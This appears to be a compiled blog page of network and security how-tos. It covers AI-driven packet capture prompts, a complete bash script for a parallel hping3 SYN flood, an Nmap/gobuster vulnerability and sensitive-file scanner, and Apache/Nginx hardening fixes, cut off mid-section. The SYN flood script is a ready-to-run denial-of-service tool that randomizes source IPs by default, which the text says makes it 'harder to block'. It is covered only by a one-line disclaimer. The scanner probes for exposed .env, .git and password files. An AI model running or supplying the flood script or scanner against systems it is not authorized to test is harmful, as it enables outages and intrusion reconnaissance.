As a network troubleshooter, analyze all DNS queries for 30 seconds and provide potential causes for any errors. Show me detailed metrics on any calls, especially failed calls or unusual DNS patterns (like NXDOMAIN, PTR or TXT calls)

14. Certificate Issues. Ask Claude:

Capture TLS handshakes for the next minute and show me the certificate chain. Look out for failed/short live TLS sessions

What Makes This Powerful?

The traditional way used to be:

```bash
sudo tcpdump -i utun5 -w capture.pcap
# Wait…
# Stop capture
# Open Wireshark
# Apply filters
# Analyze packets manually
# Figure out what it means
```
Time: 10-30 minutes!

With WireMCP + Claude:


“Capture my network traffic and tell me
what’s happening in plain English”

Time: 30 seconds

Claude automatically:
– Captures on correct interface (utun5)
– Filters relevant packets
– Analyzes protocols
– Identifies issues
– Explains in human language
– Provides recommendations

Testing your site’s SYN flood resistance using hping3 in parallel

Using a Bash script with xargs, you can build a SYN flood test with hping3 that lets you specify the total number of SYN packets to send and scale horizontally across a configurable number of parallel processes. Spreading the workload across multiple processes gives better throughput than a single hping3 instance.

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash

# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.

# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified

# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
    echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
    echo ""
    echo "Parameters:"
    echo "  TARGET_IP           - Target IP address or hostname"
    echo "  TARGET_PORT         - Target port number (1-65535)"
    echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
    echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
    echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
    echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
    echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
    exit 1
fi

# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"

# Calculate packets per process (integer division; any remainder is not sent)
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))

# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
    echo "Using randomized source IPs (--rand-source)"
    # Use seq and xargs to parallelize the hping3 command with random source IPs
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
    echo "Using actual source IP (no randomization)"
    # Use seq and xargs to parallelize the hping3 command without source randomization
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi

echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"

EOF

chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
sudo ./syn_flood_parallel.sh 192.168.1.1 80 10000 4

# Explicitly enable source IP randomization
sudo ./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true

# Disable source IP randomization (use actual source IP)
sudo ./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false

# High-volume test with randomized IPs
sudo ./syn_flood_parallel.sh example.com 443 100000 8 true

# Test without IP randomization (easier to trace/debug)
sudo ./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (--rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

Macbook: Useful/Basic NMAP script to check for vulnerabilities and create a formatted report

If you want to quickly health-check your website, the following is a simple Nmap-based script that scans your site for common issues and formats the results as a report.

#!/bin/bash
# Nmap Vulnerability Scanner with Severity Grouping, TLS checks, and Directory Discovery
# Usage: ./vunscan.sh <target_domain>
# Colors for output
RED='\033[0;31m'
ORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
# Check if target is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <target_domain>"
echo "Example: $0 example.com"
exit 1
fi
TARGET=$1
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="vuln_scan_${TARGET}_${TIMESTAMP}"
RAW_OUTPUT="${OUTPUT_DIR}/raw_scan.xml"
OPEN_PORTS=""
# Debug output
echo "DEBUG: TARGET=$TARGET"
echo "DEBUG: TIMESTAMP=$TIMESTAMP"
echo "DEBUG: OUTPUT_DIR=$OUTPUT_DIR"
echo "DEBUG: RAW_OUTPUT=$RAW_OUTPUT"
# Create output directory
mkdir -p "$OUTPUT_DIR"
if [ ! -d "$OUTPUT_DIR" ]; then
echo -e "${RED}Error: Failed to create output directory $OUTPUT_DIR${NC}"
exit 1
fi
echo "================================================================"
echo "         Vulnerability Scanner for $TARGET"
echo "================================================================"
echo "Scan started at: $(date)"
echo "Results will be saved in: $OUTPUT_DIR"
echo ""
# Function to print section headers
print_header() {
echo -e "\n${BLUE}================================================================${NC}"
echo -e "${BLUE}$1${NC}"
echo -e "${BLUE}================================================================${NC}"
}
# Function to run nmap scan
run_scan() {
print_header "Running Comprehensive Vulnerability Scan"
echo "This may take several minutes…"
# First, determine which ports are open
echo "Phase 1: Port discovery..."
echo "Scanning for open ports (this may take a while)..."
# Try a faster scan first on common ports
nmap -p 1-1000,8080,8443,3306,5432,27017 --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null
# If user wants full scan, uncomment the next line and comment the previous one
# nmap -p- --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports.txt" 2>/dev/null
# Extract open ports
if [ -f "${OUTPUT_DIR}/open_ports_quick.txt" ]; then
OPEN_PORTS=$(grep -oE '[0-9]+/open' "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
fi
# If no ports found, try common web ports
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports found in quick scan. Checking common web ports...${NC}"
# Test common ports individually
COMMON_PORTS="80,443,8080,8443,22,21,25,3306,5432"
OPEN_PORTS=""
for port in $(echo $COMMON_PORTS | tr ',' ' '); do
echo -n "Testing port $port... "
if nmap -p $port --open "$TARGET" 2>/dev/null | grep -q "open"; then
echo "open"
if [ -z "$OPEN_PORTS" ]; then
OPEN_PORTS="$port"
else
OPEN_PORTS="$OPEN_PORTS,$port"
fi
else
echo "closed/filtered"
fi
done
fi
# Final fallback
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports detected. Using default web ports for scanning.${NC}"
OPEN_PORTS="80,443"
fi
echo ""
echo "Ports to scan: $OPEN_PORTS"
echo ""
# Main vulnerability scan with http-vulners-regex
echo "Phase 2: Vulnerability scanning..."
nmap -sV -sC --script vuln,http-vulners-regex \
--script-args vulns.showall,http-vulners-regex.paths={/} \
-p "$OPEN_PORTS" \
-oX "$RAW_OUTPUT" \
-oN "${OUTPUT_DIR}/scan_normal.txt" \
"$TARGET"
if [ $? -ne 0 ]; then
echo -e "${RED}Error: Nmap scan failed${NC}"
# Don't exit, continue with other scans
fi
}
# Function to parse and categorize vulnerabilities
parse_vulnerabilities() {
print_header "Parsing and Categorizing Vulnerabilities"
# Initialize arrays
declare -a critical_vulns=()
declare -a high_vulns=()
declare -a medium_vulns=()
declare -a low_vulns=()
declare -a info_vulns=()
# Create temporary files for each severity
CRITICAL_FILE="${OUTPUT_DIR}/critical.tmp"
HIGH_FILE="${OUTPUT_DIR}/high.tmp"
MEDIUM_FILE="${OUTPUT_DIR}/medium.tmp"
LOW_FILE="${OUTPUT_DIR}/low.tmp"
INFO_FILE="${OUTPUT_DIR}/info.tmp"
# Clear temp files
> "$CRITICAL_FILE"
> "$HIGH_FILE"
> "$MEDIUM_FILE"
> "$LOW_FILE"
> "$INFO_FILE"
# Parse XML output for vulnerabilities
if [ -f "$RAW_OUTPUT" ]; then
# Extract script output and categorize by common vulnerability indicators
grep -A 20 '<script id=".*vuln.*"' "$RAW_OUTPUT" | while read line; do
if echo "$line" | grep -qi "CRITICAL\|CVE.*CRITICAL\|score.*9\|score.*10"; then
echo "$line" >> "$CRITICAL_FILE"
elif echo "$line" | grep -qi "HIGH\|CVE.*HIGH\|score.*[7-8]"; then
echo "$line" >> "$HIGH_FILE"
elif echo "$line" | grep -qi "MEDIUM\|CVE.*MEDIUM\|score.*[4-6]"; then
echo "$line" >> "$MEDIUM_FILE"
elif echo "$line" | grep -qi "LOW\|CVE.*LOW\|score.*[1-3]"; then
echo "$line" >> "$LOW_FILE"
elif echo "$line" | grep -qi "INFO\|INFORMATION"; then
echo "$line" >> "$INFO_FILE"
fi
done
# Also parse normal output for vulnerability information
if [ -f "${OUTPUT_DIR}/scan_normal.txt" ]; then
# Look for common vulnerability patterns in normal output
grep -E "(CVE-|VULNERABLE|State: VULNERABLE)" "${OUTPUT_DIR}/scan_normal.txt" | while read vuln_line; do
if echo "$vuln_line" | grep -qi "critical\|9\.[0-9]\|10\.0"; then
echo "$vuln_line" >> "$CRITICAL_FILE"
elif echo "$vuln_line" | grep -qi "high\|[7-8]\.[0-9]"; then
echo "$vuln_line" >> "$HIGH_FILE"
elif echo "$vuln_line" | grep -qi "medium\|[4-6]\.[0-9]"; then
echo "$vuln_line" >> "$MEDIUM_FILE"
elif echo "$vuln_line" | grep -qi "low\|[1-3]\.[0-9]"; then
echo "$vuln_line" >> "$LOW_FILE"
else
echo "$vuln_line" >> "$INFO_FILE"
fi
done
fi
fi
}
# Function to display vulnerabilities by severity
display_results() {
print_header "VULNERABILITY SCAN RESULTS"
# Critical Vulnerabilities
echo -e "\n${RED}🔴 CRITICAL SEVERITY VULNERABILITIES${NC}"
echo "=================================================="
if [ -s "${OUTPUT_DIR}/critical.tmp" ]; then
cat "${OUTPUT_DIR}/critical.tmp" | head -20
CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
echo -e "${RED}Total Critical: $CRITICAL_COUNT${NC}"
else
echo -e "${GREEN}✓ No critical vulnerabilities found${NC}"
fi
# High Vulnerabilities
echo -e "\n${ORANGE}🟠 HIGH SEVERITY VULNERABILITIES${NC}"
echo "============================================="
if [ -s "${OUTPUT_DIR}/high.tmp" ]; then
cat "${OUTPUT_DIR}/high.tmp" | head -15
HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
echo -e "${ORANGE}Total High: $HIGH_COUNT${NC}"
else
echo -e "${GREEN}✓ No high severity vulnerabilities found${NC}"
fi
# Medium Vulnerabilities
echo -e "\n${YELLOW}🟡 MEDIUM SEVERITY VULNERABILITIES${NC}"
echo "==============================================="
if [ -s "${OUTPUT_DIR}/medium.tmp" ]; then
cat "${OUTPUT_DIR}/medium.tmp" | head -10
MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
echo -e "${YELLOW}Total Medium: $MEDIUM_COUNT${NC}"
else
echo -e "${GREEN}✓ No medium severity vulnerabilities found${NC}"
fi
# Low Vulnerabilities
echo -e "\n${BLUE}🔵 LOW SEVERITY VULNERABILITIES${NC}"
echo "=========================================="
if [ -s "${OUTPUT_DIR}/low.tmp" ]; then
cat "${OUTPUT_DIR}/low.tmp" | head -8
LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
echo -e "${BLUE}Total Low: $LOW_COUNT${NC}"
else
echo -e "${GREEN}✓ No low severity vulnerabilities found${NC}"
fi
# Information/Other
echo -e "\n${GREEN}ℹ️  INFORMATIONAL${NC}"
echo "========================="
if [ -s "${OUTPUT_DIR}/info.tmp" ]; then
cat "${OUTPUT_DIR}/info.tmp" | head -5
INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo -e "${GREEN}Total Info: $INFO_COUNT${NC}"
else
echo "No informational items found"
fi
}
# Function to run gobuster scan for enhanced directory discovery
run_gobuster_scan() {
echo "Running gobuster directory scan..."
GOBUSTER_RESULTS="${OUTPUT_DIR}/gobuster_results.txt"
PERMISSION_ANALYSIS="${OUTPUT_DIR}/gobuster_permissions.txt"
> "$PERMISSION_ANALYSIS"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Scanning $PROTOCOL://$TARGET:$port with gobuster..."
# Run gobuster with common wordlist
if [ -f "/usr/share/wordlists/dirb/common.txt" ]; then
WORDLIST="/usr/share/wordlists/dirb/common.txt"
elif [ -f "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ]; then
WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
else
# Create a small built-in wordlist
WORDLIST="${OUTPUT_DIR}/temp_wordlist.txt"
cat > "$WORDLIST" <<EOF
admin
administrator
api
backup
bin
cgi-bin
config
data
database
db
debug
dev
development
doc
docs
documentation
download
downloads
error
errors
export
files
hidden
images
img
include
includes
js
library
log
logs
manage
management
manager
media
old
private
proc
public
resources
scripts
secret
secure
server-status
staging
static
storage
system
temp
templates
test
testing
tmp
upload
uploads
users
var
vendor
web
webapp
wp-admin
wp-content
.git
.svn
.env
.htaccess
.htpasswd
robots.txt
sitemap.xml
web.config
phpinfo.php
info.php
test.php
EOF
fi
# Run gobuster with status code analysis
gobuster dir -u "$PROTOCOL://$TARGET:$port" \
-w "$WORDLIST" \
-k \
-t 10 \
--no-error \
-o "${GOBUSTER_RESULTS}_${port}.txt" \
-s "200,204,301,302,307,401,403,405" 2>/dev/null
# Analyze results for permission issues
if [ -f "${GOBUSTER_RESULTS}_${port}.txt" ]; then
echo "Analyzing gobuster results for permission issues..."
# Check for 403 Forbidden directories
grep "Status: 403" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${ORANGE}[403 Forbidden]${NC} $PROTOCOL://$TARGET:$port$dir - Directory exists but access denied" >> "$PERMISSION_ANALYSIS"
echo -e "${ORANGE}  Permission Issue:${NC} $PROTOCOL://$TARGET:$port$dir (403 Forbidden)"
done
# Check for 401 Unauthorized directories
grep "Status: 401" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${YELLOW}[401 Unauthorized]${NC} $PROTOCOL://$TARGET:$port$dir - Authentication required" >> "$PERMISSION_ANALYSIS"
echo -e "${YELLOW}  Auth Required:${NC} $PROTOCOL://$TARGET:$port$dir (401 Unauthorized)"
done
# Check for directory listing enabled (potentially dangerous)
grep "Status: 200" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
# Check if it's a directory by looking for trailing slash or common directory patterns
if [[ "$dir" =~ /$ ]] || [[ ! "$dir" =~ \. ]]; then
# Test if directory listing is enabled
RESPONSE=$(curl -k -s --max-time 5 "$PROTOCOL://$TARGET:$port$dir" 2>/dev/null)
if echo "$RESPONSE" | grep -qi "index of\|directory listing\|parent directory\|<pre>\|<dir>"; then
echo -e "${RED}[Directory Listing Enabled]${NC} $PROTOCOL://$TARGET:$port$dir - SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Directory Listing:${NC} $PROTOCOL://$TARGET:$port$dir"
fi
fi
done
# Check for sensitive files with incorrect permissions
for sensitive_file in ".git/config" ".env" ".htpasswd" "web.config" "phpinfo.php" "info.php" ".DS_Store" "Thumbs.db"; do
if grep -q "/$sensitive_file.*Status: 200" "${GOBUSTER_RESULTS}_${port}.txt"; then
echo -e "${RED}[Sensitive File Exposed]${NC} $PROTOCOL://$TARGET:$port/$sensitive_file - CRITICAL SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Sensitive File:${NC} $PROTOCOL://$TARGET:$port/$sensitive_file"
fi
done
fi
done
# Clean up temporary wordlist if created
[ -f "${OUTPUT_DIR}/temp_wordlist.txt" ] && rm -f "${OUTPUT_DIR}/temp_wordlist.txt"
# Display permission analysis summary
if [ -s "$PERMISSION_ANALYSIS" ]; then
echo ""
echo -e "${ORANGE}=== Directory Permission Issues Summary ===${NC}"
cat "$PERMISSION_ANALYSIS"
# Count different types of issues
FORBIDDEN_COUNT=$(grep -c "403 Forbidden" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
UNAUTH_COUNT=$(grep -c "401 Unauthorized" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
LISTING_COUNT=$(grep -c "Directory Listing Enabled" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
SENSITIVE_COUNT=$(grep -c "Sensitive File Exposed" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
echo ""
echo "Permission Issue Statistics:"
echo "  - 403 Forbidden directories: $FORBIDDEN_COUNT"
echo "  - 401 Unauthorized directories: $UNAUTH_COUNT"
echo "  - Directory listings enabled: $LISTING_COUNT"
echo "  - Sensitive files exposed: $SENSITIVE_COUNT"
fi
}
# Function to run TLS/SSL checks
run_tls_checks() {
print_header "Running TLS/SSL Security Checks"
# Check for HTTPS ports
HTTPS_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '443|8443' | tr '\n' ',' | sed 's/,$//')
if [ -z "$HTTPS_PORTS" ]; then
HTTPS_PORTS="443"
echo "No HTTPS ports found in scan, checking default port 443..."
fi
echo "Checking TLS/SSL on ports: $HTTPS_PORTS"
# Run SSL scan using nmap ssl scripts
nmap -sV --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-ccs-injection,ssl-heartbleed,ssl-poodle,sslv2,tls-alpn,tls-nextprotoneg \
-p "$HTTPS_PORTS" \
-oN "${OUTPUT_DIR}/tls_scan.txt" \
"$TARGET" 2>/dev/null
# Parse TLS results
TLS_ISSUES_FILE="${OUTPUT_DIR}/tls_issues.txt"
> "$TLS_ISSUES_FILE"
# Check for weak ciphers
if grep -q "TLSv1.0\|SSLv2\|SSLv3" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "CRITICAL: Outdated SSL/TLS protocols detected" >> "$TLS_ISSUES_FILE"
fi
# Check for weak cipher suites
if grep -q "DES\|RC4\|MD5" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "HIGH: Weak cipher suites detected" >> "$TLS_ISSUES_FILE"
fi
# Check for certificate issues
if grep -q "expired\|self-signed" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "MEDIUM: Certificate issues detected" >> "$TLS_ISSUES_FILE"
fi
# Display TLS results
echo ""
if [ -s "$TLS_ISSUES_FILE" ]; then
echo -e "${RED}TLS/SSL Issues Found:${NC}"
cat "$TLS_ISSUES_FILE"
else
echo -e "${GREEN}✓ No major TLS/SSL issues detected${NC}"
fi
echo ""
}
# Function to run directory busting and permission checks
run_dirbuster() {
print_header "Running Directory Discovery and Permission Checks"
# Check for web ports
WEB_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '^(80|443|8080|8443)$' | tr '\n' ',' | sed 's/,$//')
if [ -z "$WEB_PORTS" ]; then
echo "No standard web ports found in open ports, checking defaults..."
WEB_PORTS="80,443"
fi
echo "Running directory discovery on web ports: $WEB_PORTS"
# Check if gobuster is available
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}Using gobuster for enhanced directory discovery and permission checks${NC}"
run_gobuster_scan
else
echo -e "${YELLOW}Gobuster not found. Using fallback method.${NC}"
echo -e "${YELLOW}Install gobuster for enhanced directory permission checks: brew install gobuster${NC}"
fi
# Use nmap's http-enum script for directory discovery
nmap -sV --script http-enum \
--script-args http-enum.basepath='/' \
-p "$WEB_PORTS" \
-oN "${OUTPUT_DIR}/dirbuster.txt" \
"$TARGET" 2>/dev/null
# Common directory wordlist (built-in small list)
COMMON_DIRS="admin administrator backup api config test dev staging uploads download downloads files documents images img css js scripts cgi-bin wp-admin phpmyadmin .git .svn .env .htaccess robots.txt sitemap.xml"
# Quick check for common directories using curl
DIRS_FOUND_FILE="${OUTPUT_DIR}/directories_found.txt"
> "$DIRS_FOUND_FILE"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Checking common directories on $PROTOCOL://$TARGET:$port"
for dir in $COMMON_DIRS; do
URL="$PROTOCOL://$TARGET:$port/$dir"
STATUS=$(curl -k -s -o /dev/null -w "%{http_code}" --max-time 3 "$URL" 2>/dev/null)
if [[ "$STATUS" == "200" || "$STATUS" == "301" || "$STATUS" == "302" || "$STATUS" == "401" || "$STATUS" == "403" ]]; then
echo "[$STATUS] $URL" >> "$DIRS_FOUND_FILE"
echo -e "${GREEN}Found:${NC} [$STATUS] $URL"
# Check for permission issues
if [[ "$STATUS" == "403" ]]; then
echo -e "${ORANGE}  ⚠️  Permission denied (403) - Possible misconfiguration${NC}"
echo "[PERMISSION ISSUE] 403 Forbidden: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
elif [[ "$STATUS" == "401" ]]; then
echo -e "${YELLOW}  🔒 Authentication required (401)${NC}"
echo "[AUTH REQUIRED] 401 Unauthorized: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
fi
fi
done
done
# Display results
echo ""
if [ -s "$DIRS_FOUND_FILE" ]; then
echo -e "${YELLOW}Directories/Files discovered:${NC}"
cat "$DIRS_FOUND_FILE"
else
echo "No additional directories found"
fi
# Display permission issues if found
if [ -s "${OUTPUT_DIR}/permission_issues.txt" ]; then
echo ""
echo -e "${ORANGE}Directory Permission Issues Found:${NC}"
cat "${OUTPUT_DIR}/permission_issues.txt"
fi
echo ""
}
# Function to generate summary report
generate_summary() {
print_header "SCAN SUMMARY"
CRITICAL_COUNT=0
HIGH_COUNT=0
MEDIUM_COUNT=0
LOW_COUNT=0
INFO_COUNT=0
[ -f "${OUTPUT_DIR}/critical.tmp" ] && CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
[ -f "${OUTPUT_DIR}/high.tmp" ] && HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
[ -f "${OUTPUT_DIR}/medium.tmp" ] && MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
[ -f "${OUTPUT_DIR}/low.tmp" ] && LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
[ -f "${OUTPUT_DIR}/info.tmp" ] && INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo "Target: $TARGET"
echo "Scan Date: $(date)"
echo ""
echo -e "${RED}Critical:       $CRITICAL_COUNT${NC}"
echo -e "${ORANGE}High:           $HIGH_COUNT${NC}"
echo -e "${YELLOW}Medium:         $MEDIUM_COUNT${NC}"
echo -e "${BLUE}Low:            $LOW_COUNT${NC}"
echo -e "${GREEN}Informational:  $INFO_COUNT${NC}"
echo ""
TOTAL=$((CRITICAL_COUNT + HIGH_COUNT + MEDIUM_COUNT + LOW_COUNT))
echo "Total Vulnerabilities: $TOTAL"
# Risk assessment
if [ $CRITICAL_COUNT -gt 0 ]; then
echo -e "${RED}🚨 RISK LEVEL: CRITICAL - Immediate action required!${NC}"
elif [ $HIGH_COUNT -gt 0 ]; then
echo -e "${ORANGE}⚠️  RISK LEVEL: HIGH - Action required soon${NC}"
elif [ $MEDIUM_COUNT -gt 0 ]; then
echo -e "${YELLOW}⚡ RISK LEVEL: MEDIUM - Should be addressed${NC}"
elif [ $LOW_COUNT -gt 0 ]; then
echo -e "${BLUE}📋 RISK LEVEL: LOW - Monitor and plan fixes${NC}"
else
echo -e "${GREEN}✅ RISK LEVEL: MINIMAL - Good security posture${NC}"
fi
# Save summary to file
{
echo "Vulnerability Scan Summary for $TARGET"
echo "======================================"
echo "Scan Date: $(date)"
echo ""
echo "Critical: $CRITICAL_COUNT"
echo "High: $HIGH_COUNT"
echo "Medium: $MEDIUM_COUNT"
echo "Low: $LOW_COUNT"
echo "Informational: $INFO_COUNT"
echo "Total: $TOTAL"
echo ""
echo "Additional Checks:"
[ -f "${OUTPUT_DIR}/tls_issues.txt" ] && [ -s "${OUTPUT_DIR}/tls_issues.txt" ] && echo "TLS/SSL Issues: $(wc -l < "${OUTPUT_DIR}/tls_issues.txt")"
[ -f "${OUTPUT_DIR}/directories_found.txt" ] && [ -s "${OUTPUT_DIR}/directories_found.txt" ] && echo "Directories Found: $(wc -l < "${OUTPUT_DIR}/directories_found.txt")"
[ -f "${OUTPUT_DIR}/gobuster_permissions.txt" ] && [ -s "${OUTPUT_DIR}/gobuster_permissions.txt" ] && echo "Directory Permission Issues: $(wc -l < "${OUTPUT_DIR}/gobuster_permissions.txt")"
} > "${OUTPUT_DIR}/summary.txt"
}
# Main execution
main() {
echo "Starting vulnerability scan for $TARGET…"
# Check if required tools are installed
if ! command -v nmap &> /dev/null; then
echo -e "${RED}Error: nmap is not installed. Please install nmap first.${NC}"
exit 1
fi
if ! command -v curl &> /dev/null; then
echo -e "${RED}Error: curl is not installed. Please install curl first.${NC}"
exit 1
fi
# Check for optional tools
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}✓ Gobuster found - Enhanced directory scanning enabled${NC}"
else
echo -e "${YELLOW}ℹ️  Gobuster not found - Basic directory scanning will be used${NC}"
echo -e "${YELLOW}   Install with: brew install gobuster (macOS) or apt install gobuster (Linux)${NC}"
fi
# Run the main vulnerability scan
run_scan
# Run TLS/SSL checks
run_tls_checks
# Run directory discovery
run_dirbuster
# Parse results
parse_vulnerabilities
# Display formatted results
display_results
# Generate summary
generate_summary
# Cleanup temporary files
rm -f "${OUTPUT_DIR}"/*.tmp
print_header "SCAN COMPLETE"
echo "All results saved in: $OUTPUT_DIR"
echo "Summary saved in: ${OUTPUT_DIR}/summary.txt"
echo -e "${GREEN}Scan completed at: $(date)${NC}"
}
# Run main function
main

Here’s a comprehensive guide on how to fix each type of directory permission issue that the above script might find (mainly for Apache, with Nginx equivalents where relevant):

## 1. **403 Forbidden Errors**
### What it means:
The directory/file exists but the server is denying access to it.
### How to fix:
# For Apache (.htaccess)
# Add to .htaccess in the directory:
Order deny,allow
Deny from all
# Or remove the directory from web access entirely
# Move sensitive directories outside the web root
mv /var/www/html/backup /var/backups/
# For Nginx
# Add to nginx.conf:
location /admin {
deny all;
return 404;  # Return 404 instead of 403 to hide existence
}
## 2. **401 Unauthorized Errors**
### What it means:
Authentication is required but may not be properly configured.
### How to fix:
# For Apache - create .htpasswd file
htpasswd -c /etc/apache2/.htpasswd username
# Add to .htaccess:
AuthType Basic
AuthName "Restricted Access"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
# For Nginx:
# Install apache2-utils for htpasswd
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd username
# Add to nginx.conf:
location /admin {
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.htpasswd;
}
## 3. **Directory Listing Enabled (CRITICAL)**
### What it means:
Anyone can see all files in the directory - major security risk!
### How to fix:
# For Apache
# Method 1: Add to .htaccess in the directory
Options -Indexes
# Method 2: Add to Apache config (httpd.conf or apache2.conf)
<Directory /var/www/html>
Options -Indexes
</Directory>
# For Nginx
# Add to nginx.conf (Nginx doesn't have directory listing by default)
# If you see it enabled, remove:
autoindex off;  # This should be the default
# Create index files in empty directories
echo "<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1></body></html>" > index.html
## 4. **Sensitive Files Exposed (CRITICAL)**
### Common exposed files and fixes:
#### **.git directory**
# Remove .git from production
rm -rf /var/www/html/.git
# Or block access via .htaccess (a <Files> match will not cover files inside .git/,
# so use RedirectMatch from mod_alias instead)
RedirectMatch 404 /\.git
# For Nginx:
location ~ /\.git {
deny all;
return 404;
}
#### **.env file**
# Move outside web root
mv /var/www/html/.env /var/www/
# Update your application to read from new location
# In PHP: require_once __DIR__ . '/../.env';
# Block via .htaccess
<Files .env>
Order allow,deny
Deny from all
</Files>
#### **Configuration files (config.php, settings.php)**
